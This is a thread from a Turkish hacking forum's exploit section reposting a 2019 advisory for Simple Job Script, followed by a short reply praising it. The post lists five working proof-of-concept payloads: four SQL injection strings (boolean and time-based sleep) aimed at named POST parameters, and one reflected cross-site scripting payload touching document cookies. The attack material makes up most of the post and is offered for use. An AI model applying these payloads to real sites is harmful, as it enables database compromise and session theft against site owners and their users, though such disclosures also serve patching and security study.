Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...




SJS Simple Job Script - SQL Injection / Cross-Site Scripting

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 3 Hafta önce   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110


SJS Simple Job Script - SQL Injection / Cross-Site Scripting



# Exploit Başlığı: Simple Job Script - Multiple Vulnerabilities
# Date/Tarih: 26.03.2019
# Exploit Author/Exploit Yazarı: Ahmet Ümit BAYRAM
# Vendor Homepage/Yapımcı Anasayfa: https://simplejobscript.com/
# Download Link/Yazılım İndirme Linki:
https://github.com/niteosoft/simplej...ive/master.zip
# Demo Site: https://demo.simplejobscript.com
# Version/Versiyon: Lastest/En son
# Tested on/Test Edilen Sistem: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/searched
Vulnerable Parameter: landing_******** (POST)
Payload:
landing_********=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test



----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/get_job_applications_ajax.php
Vulnerable Parameter: job_id (POST)
Payload: job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/register-recruiters
Vulnerable Parameter: employerid (POST)
Payload: if(now()=sysdate(),sleep(0),0)


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/delete_application_ajax.php
Vulnerable Parameter: app_id (POST)
Payload:
app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(se lect(0)from(select(sleep(0)))v)%2B"*/


----- PoC 5: XSS -----

Request:
http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_********_val[]=fulltime_ctype
Vulnerable Parameter: job_type_value[] (GET)
Payload: "><svg+onload%3Dalert(********.cookie)>



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE

 Offline  
 
Alıntı ile Cevapla
Alt 3 Hafta önce   #2
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
09/2018
Nereden
Öteki taraf
Mesajlar
Konular

Teşekkür (Etti): 16
Teşekkür (Aldı): 91




Gerçekten emek var, helal olsun



___________________________________________

█║▌│█│║▌║││█║▌║▌║

© Copyrigt 1995-2019

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau